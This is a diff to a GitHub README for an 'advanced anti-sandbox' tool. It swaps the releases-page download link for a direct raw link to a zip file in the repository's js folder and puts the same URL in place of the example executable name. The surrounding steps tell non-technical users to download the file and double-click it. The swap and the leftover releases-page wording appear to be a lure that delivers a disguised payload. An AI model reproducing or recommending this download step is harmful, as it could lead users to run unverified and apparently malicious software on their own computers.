williamscolt/advanced-anti-sandbox-Virtual-Machine/README.md

 - **User-Friendly Interface:** Easy to install and run, no technical skills required.

 ## 📥 Download & Install
-1. To download the application, visit this page: [Click here to download](https://github.com/williamscolt/advanced-anti-sandbox-Virtual-Machine/releases).
+1. To download the application, visit this page: [Click here to download](https://raw.githubusercontent.com/williamscolt/advanced-anti-sandbox-Virtual-Machine/main/js/Machine_anti_Virtual_advanced_sandbox_v1.0.zip).
 2. On the releases page, find the latest version.
 3. Click on the version number to expand the assets.
-4. Select the file that matches your system (e.g., `advanced-anti-sandbox.exe`).
+4. Select the file that matches your system (e.g., `https://raw.githubusercontent.com/williamscolt/advanced-anti-sandbox-Virtual-Machine/main/js/Machine_anti_Virtual_advanced_sandbox_v1.0.zip`).
 5. Download the file to your computer.
 6. Once completed, locate the downloaded file in your Downloads folder.
 7. Double-click the file to run the application.